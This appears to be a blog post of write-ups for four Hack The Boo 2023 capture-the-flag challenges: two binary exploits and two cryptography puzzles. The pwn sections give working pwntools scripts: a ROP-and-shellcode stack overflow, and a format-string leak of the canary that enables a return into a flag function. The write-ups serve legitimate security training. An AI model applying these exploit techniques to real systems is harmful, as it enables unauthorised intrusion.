13 minute read

Some writeups for this year’s Hack The Boo competition. Thanks to the organizers at HTB for a great event!


Pinata

The first pwn challenge was a statically compiled binary with very few security features enabled.

>>> from pwn import *
>>> exe = ELF('./pinata')
[*] '/.../hack-the-boo-2023/pwn/pinata/challenge/pinata'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x400000)
    Stack:    Executable
    RWX:      Has RWX segments

It turns out that the “Canary found” was a false positive as well. The fact that the stack was executable seemed pretty juicy.

When running the code, we’re met with the following:

% nc 94.237.52.19 46643
██████████████████████████████████
        █
        █
        █
        █
        █       ████
        █      ██████
        █      ██ ██
 ████████████████
███████████████▬
  █████████████
  ██ ██  ██ ██
  ██ ██  ██ ██

Scream as much as you can to break the pinata!!

>>

Entering a long string caused a crash. Seems like a buffer overflow.

Decompiling in ghidra gives the following code for the reader function:

int reader(UI *ui,UI_STRING *uis)

{
  char *pcVar1;
  char local_18 [16];
  
  pcVar1 = gets(local_18);
  return (int)pcVar1;
}

This reads an arbitrary-length string into a 16-byte buffer. There’s our overflow!

Since it was statically compiled and didn’t use the system command, I wasn’t able to use a ROP chain to return into that function. However, given that the stack is executable, I could put my shellcode there and return into it. I just needed to leak the stack address.

One way to leak an address on the stack is to use the environ variable. The first phase of the attack used the write function (via a ROP chain) to leak the environ variable and then return back into reader for another round. OFFSET_RET was defined as the offset from the start of the overflowed buffer to the return address on the stack (found using the debugger).

def main():
    io = conn()
	
	# ROP chain to call `write` with the `environ` address.
	rop = ROP(exe)
	rop.write(1, exe.symbols['environ'], 8)

	io.recvuntil(b'>> ')
	io.sendline(
		b''.join([
			b'A' * OFFSET_RET,
			bytes(rop),
			p64(exe.symbols['reader']),
		])
	)

Next, the value of environ was read in to get a stack address, and again using the debugger, we can find the offset to the top of the stack on the next run of reader.

	environ_stack_addr = unpack(io.recv(numb=8))
	top_of_stack = environ_stack_addr - OFFSET_ENVIRON_TOP_OF_STACK
	log.info(f'Top of stack: {hex(top_of_stack)}')

Finally, we can return into an address on the stack. Since we only have 16 bytes before the return address, we have to calculate the offset from the top of the stack to the address immediately after the return address. That’s where we can put the shellcode, and that’s the address to return into.

	io.sendline(
		b''.join([
			b'C' * OFFSET_RET,
			p64(top_of_stack + 0x20),
			asm(shellcraft.amd64.linux.sh())
		])
	)

And voila! We have a shell :)

% ./solve.py
[*] '/.../hack-the-boo-2023/pwn/pinata/challenge/pinata'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x400000)
    Stack:    Executable
    RWX:      Has RWX segments
[+] Opening connection to 94.237.52.19 on port 46643: Done
[*] Loaded 124 cached gadgets for './pinata'
[*] Top of stack: 0x7ffeffec5e08
[*] Switching to interactive mode
$ cat flag.txt
HTB{5t4t1c4lly_l1nk3d_jmp_r4x_sc}

Claw Machine

This was another binary hacking challenge. However, this time the vulnerable function had a bit more to it.

The program was a “claw machine” game.

▛▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▜
▌▓▒▓▒▓▒▓▒▓▒▓▒▓▒▓▒▓▒▓▒▓▒▓▒▓▒▐
▌▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▐
█            |             █
█            |             █
█            |             █
█         /▔▔ ▔▔          █
█        |       |         █
█              /          █
█                          █
█                          █
█        __________        █
█        |flag.txt|        █
████████████████████████████

Press '1' to move left, '2' to move right, '9' to grab the prize!

>>

Playing around a bit, it was quite hard to win.

▛▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▜
▌▓▒▓▒▓▒▓▒▓▒▓▒▓▒▓▒▓▒▓▒▓▒▓▒▓▒▐
▌▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▐
█      |                   █
█      |                   █
█      |                   █
█      |                   █
█      |                   █
█      |                   █
█   /▔▔ ▔▔                █
█  |       |               █
█        /  ______        █
█        |flag.txt|        █
████████████████████████████

[-] You broke the box and couldn't get the prize!

Would you like to rate our game? (y/n)

>>

However, after losing, it asked for some additional inputs, and I quickly found a format string vulnerability.

Would you like to rate our game? (y/n)

>> y

Enter your name: %p

Thank you for giving feedback 0x7ffd5c510230

Leave your feedback here: Good game

Thank you for playing!

Checking out the code in ghidra, I found the code in the fb function that handles this:

void fb(void)

{
  long in_FS_OFFSET;
  char answer [2];
  char name [16];
  char feedback [64];
  long canary;
  
  canary = *(long *)(in_FS_OFFSET + 0x28);
  answer[0] = ' ';
  answer[1] = ' ';
  name[0] = ' ';
  ...
  name[15] = ' ';
  feedback[0] = ' ';
  ...
  feedback[63] = ' ';
  printf("Would you like to rate our game? (y/n)nn>> ");
  read(0,answer,2);
  if ((answer[0] == 'y') || (answer[0] == 'Y')) {
    printf("nEnter your name: ");
    read(0,name,0x10);
    printf("nThank you for giving feedback ");
    printf(name);
    printf("nLeave your feedback here: ");
    read(0,feedback,0x5e);
  }
  puts("nThank you for playing!n");
  if (canary != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

We can see above that there are actually two vulnerabilities: a format string vulnerability as discovered previously, printf(name), and a stack buffer overflow, since read(0,feedback,0x5e) reads 94 bytes into a 64-byte buffer.

It’s worth noting that this binary has all of the safety features enabled:

>>> from pwn import *
>>> exe = ELF('./claw_machine')
[*] '/.../hack-the-boo-2023/pwn/claw_machine/challenge/claw_machine'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    RUNPATH:  b'./glibc/'

However, it also happens to contain a very convenient read_flag function:

void read_flag(void)

{
  ssize_t sVar1;
  long in_FS_OFFSET;
  char local_15;
  int local_14;
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  local_14 = open("./flag.txt",0);
  if (local_14 < 0) {
    perror("nError opening flag.txt, please contact an Administrator.n");
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  while( true ) {
    sVar1 = read(local_14,&local_15,1);
    if (sVar1 < 1) break;
    fputc((int)local_15,stdout);
  }
  close(local_14);
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

So the solution is to use the format string vulnerability to leak any data that we need, and then use the buffer overflow to return into read_flag.

First of all, since the executable has PIE enabled (Position Independent Executable), we need to leak an address within the executable itself, so that we can get the address of read_flag. The stack contains the return address of the fb function which happens to be main+53. So we can leak this address, and do some arithmetic to get the base address of the executable, and finally use that to get the address of read_flag.

We also need to leak the stack canary so that when we overflow the buffer, we can write the stack canary in place so the return from the function still works.

Using the debugger to find the offsets, the code to do the above looks like this.

	# Step 1: print return address (`main+53`) and canary.
	io.recvuntil(b'Enter your name: ')
	io.sendline(b'%23$p.%21$p')
	
	# Get the values.
	io.recvuntil(b'Thank you for giving feedback ')
	values = io.recvline().split(b'.')

	addr_main_53 = int(values[0], 16)
	canary = int(values[1], 16)

	log.info(f'Addr (main+53): {hex(addr_main_53)}')
	log.info(f'Canary: {hex(canary)}')

	# Set the offset of exe.
	exe.address = addr_main_53 - (exe.symbols['main'] + 53)

	addr_read_flag = exe.symbols["read_flag"]
	log.info(f'Address of read_flag: {hex(addr_read_flag)}')

Then, after finding the offset from the start of the stack buffer to the canary (using <a href="https://docs.pwntools.com/en/stable/util/cyclic.html#pwnlib.util.cyclic.cyclic">cyclic</a> and <a href="https://docs.pwntools.com/en/stable/util/cyclic.html#pwnlib.util.cyclic.cyclic_find">cyclic_find</a> from pwntools, along with the debugger), we can overflow the buffer, write the canary, write garbage into the saved rbp, and overwrite the stack address:

	# Step 2: return into `read_flag`, fixing the canary on the way.
	io.sendline(b''.join([
		b'A' * offset,
		p64(canary),
		b'B' * 8,
		p64(addr_read_flag),
	]))

And that’s it!

% ./solve.py
[*] '/.../hack-the-boo-2023/pwn/claw_machine/challenge/claw_machine'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    RUNPATH:  b'./glibc/'
[+] Opening connection to 94.237.62.195 on port 34892: Done
[*] Addr (main+53): 0x5639e9a01552
[*] Canary: 0x8859e4851515dd00
[*] Address of read_flag: 0x5639e9a00b84
[*] Switching to interactive mode

Thank you for playing!

HTB{gr4b_th3_fl4g_w1th_fmt}

Symbols

The first crypto challenge came with a source.py file showing how the flag was encrypted, and an output.txt file with the encrypted output.

source.py

from secret import FLAG
from random import randint

p = 307163712384204009961137975465657319439
g = 1337


def encrypt(m):
    bits = bin(m)[2:]
    encrypted = []

    for b in bits:
        r = (randint(2, p) << 1) + int(b)
        encrypted.append(pow(g, r, p))

    return encrypted


def main():
    flag = int.from_bytes(FLAG, 'big')
    encrypted_flag = encrypt(flag)

    with open('output.txt', 'w') as f:
        f.write(str(encrypted_flag))


if __name__ == '__main__':
    main()

output.txt

[236195756868517656723513582436861606906, 57834783484301373179714799552205481954, 267720308275932715147205375538382826955, ... ]

In pseudocode, the encrypt function does the following:

  • Break the message (which has been converted into an int) into its individual bits.
  • For each bit:
    • Pick a random number between 1 and p - 1 (where p is a large prime number defined above).
    • Multiply that number by 2 (this is done using a bit shift operation: << 1).
    • Add the bit of the message. Store the result in r.
    • Compute g ^ r mod p (where g == 1337). Append the result in the encrypted array.
  • The encrypted array contains our ciphertext output.

The trick here is to analyze the r variable and realize that it is going to be an even number whenever the bit is 0, and an odd number whenever the bit is 1. This means that each item of our ciphertext takes the form c = 1337 ^ r mod p and if we can determine whether r is odd or even, then that tells us the value of the corresponding bit in the plaintext.

So how do we determine if r is even or odd? Well, if r is even, 1337 ^ r is a perfect square, and c is what’s know as a quadratic residue. It turns out there is an efficient algorithm for determining whether a number is a quadratic residue under a given modulus, and I grabbed some code to calculate it for me.

After messing with the code a little bit, I ran it against each of the numbers in output.txt, put the bits back together, and got the flag!

solve.py

#!/usr/bin/env python3

from pwn import *

p = 307163712384204009961137975465657319439
g = 1337

# This is correct if it is only ever run on a prime number, which `p` is.
def factor(n):
	return [(n, 1)]

def power_mod(base, exp, mod):
	return pow(base, exp, mod)

def peel(a, p):
	# Returns (k, b) such that a = p^k * b and b is minimal.
	if a == 0: return (1, 0)
	k = 0
	while a % p == 0:
		k += 1
		a = a // p
	return (k, a)

def is_quadratic_residue(a, n):
	for (p, e) in factor(n):
		(k, b) = peel(a % p**e, p)
		if b == 0: continue
		if k % 2: return False
		if p == 2:
			if e == 1: continue
			if b % 4 != 1: return False
			if e >= 3 and b % 8 != 1: return False
		else:  # Euler's criterion
			if power_mod(b, (p - 1)//2, p) != 1:
				return False
	return True

def main():
	with open('./output.txt', 'r') as f:
		output = eval(f.read())

	s = ''.join(map(lambda c: ('0' if is_quadratic_residue(c, p) else '1'), output))
	i = int(s, 2)
	flag = pack(i, endianness='big', word_size='all')
	print(flag)

if __name__ == '__main__':
	main()

Output:

% ./solve.py
b'HTB{l3g3ndr3_symb0l_1s_0v3rp0w3r3d}'

Leakin Park

This one was an RSA encryption which instead of providing the usual N with the public key, it returned another number instead, which seemed to be calculated in a strange way.

source.py

from Crypto.Util.number import long_to_bytes, bytes_to_long, getPrime
from sympy import nextprime
import math
from secret import FLAG

FLAG = 'fakeflag'

MAX = 0x100

def factors():
    return [getPrime(int(math.log2(MAX))) for i in range(int(math.log2(MAX)))]

class RSA:
    def __init__(self):
        p, q, self.leak = self.craft_primes()
        self.n = p * q
        self.e = 0x10001

    def craft_primes(self):
        numb = 1
        count, p, q = 0, 0, 0

        for i in factors():
            count += 1
            numb *= math.prod(range(1, i))

            if count == 4:
                p = nextprime(numb)
            if count == 8:
                q = nextprime(numb//p)

        return p, q, numb
    
    def encrypt(self, m):
        return pow(m, self.e, self.n)

def main():
    rsa = RSA()

    ct = rsa.encrypt(bytes_to_long(FLAG))

    with open('output.txt', 'w') as f:
        f.write(f'{hex(rsa.leak)[2:]}n{hex(rsa.e)[2:]}n{hex(ct)[2:]}')

if __name__ == "__main__":
    main()

Some analysis and testing uncovered the following:

  • The factors function returned an array of size 8 with random prime numbers less than 256.
  • The craft_primes function creates the RSA primes p and q along with this strange other number numb as follows:
    • Iterate through the array returned by factors.
    • For each such number, i, calculate math.prod(range(1, i)). In mathematical terms, this computes (i - 1)! (the factorial of i - 1).
    • Multiply this number by numb, so numb eventually becomes the product of all of these factorials.
    • After we’ve gotten through 4 elements of the factors() array, we compute p = nextprime(numb) which, as you may guess, gets the next prime number larger than numb.
    • After we’ve gotten through 8 elements, we compute q = nextprime(numb//p).

The encryption is then done using standard RSA, and we are given the resulting numb.

It seems the goal is to figure out what p and q might be, which will allow us to reverse the RSA encryption. But how might we do that?

As a first step, I figured that we could work backwards from numb to figure out the “factorial factors” that were used to create it. There are only ~40 primes that could be returned by factors(), so we could more-or-less try all of them, compute the factorials, see if they are a factor of numb, rinse and repeat. In the end I wrote a backtracking algorithm to find all of the factors.

from math import factorial, prod
from itertools import combinations
from sympy import nextprime
from time import time

...

primes = [2, 3, 5, 7, 11, 13, 17, 19, 23,
  29, 31, 37, 41, 43, 47, 53, 59, 61, 67,
  71, 73, 79, 83, 89, 97, 101, 103, 107,
  109, 113, 127, 131, 137, 139, 149, 151,
  157, 163, 167, 173, 179, 181, 191, 193,
  197, 199, 211, 223, 227, 229, 233, 239,
  241, 251]

possible_factorial_factors = list(map(lambda x: x-1, primes))

def find_factorial_factors(n):
	if n <= 1:
		return []

	for p in reversed(possible_factorial_factors):
		f = factorial(p)
		if n % f != 0:
			continue

		additional_factorial_factors = find_factorial_factors(n // f)

		if additional_factorial_factors != False:
			return additional_factorial_factors + [p]

	return False

The algorithm gave us the following factorial factors for numb:

[130, 148, 148, 172, 178, 180, 240, 250]

But how do we use this to get p and q?

Well first of all, the above array gives us the output of the factor() function which was used to compute numb along with p and q (technically we would have to add 1 to each number to get the exact output of that function). Then we know that 4 of those numbers were used to compute factorials and multiply together before using nextprime to get p. Once we know p, we can get q easily since it was computed with q = nextprime(numb//p) after all of the factors were used, meaning that we already know the value of numb for that calculation, we only need p.

But which 4 values were used to compute p? Well, how many options could there be?

Turns out there are 50 unique possibilities for the values used to compute p. There would have been 70, except that two of the factors are the same (148) which reduces our options.

So the next step was to use all 50 unique combinations of 4 values from the array, calculate the partial numb from those factors, and compute a guess for p and q, leaving us with 50 guesses.

from math import factorial, prod
from itertools import combinations
from sympy import nextprime
from time import time

numb = ...

...

def guess_all_p_q(factorial_factors):
	global numb

	combs = set(combinations(factorial_factors, 4))

	start_time = time()
	i = 0

	guesses = []
	for comb in combs:
		print(f'Guessing with combination: {comb}')
		print(f'Time elapsed: {time() - start_time}')
		print(f'Progress: {i} / {len(combs)}', flush=True)
		i += 1

		numb_partial = multiply_factorial_factors(comb)

		p = nextprime(numb_partial)
		q = nextprime(numb // p)

		guesses.append({'p': p, 'q': q})

	return guesses

Computing nextprime was a bit slow, but in the end the script took a little under 15 minutes. Once we had all of the guesses for p and q, we could just iterate through them and decrypt the ciphertext until we found one that looked like the flag.

b'HTB{numb3rz_ar3_l3ak1ng_fr0m_3v3rywh3r3}'

Updated: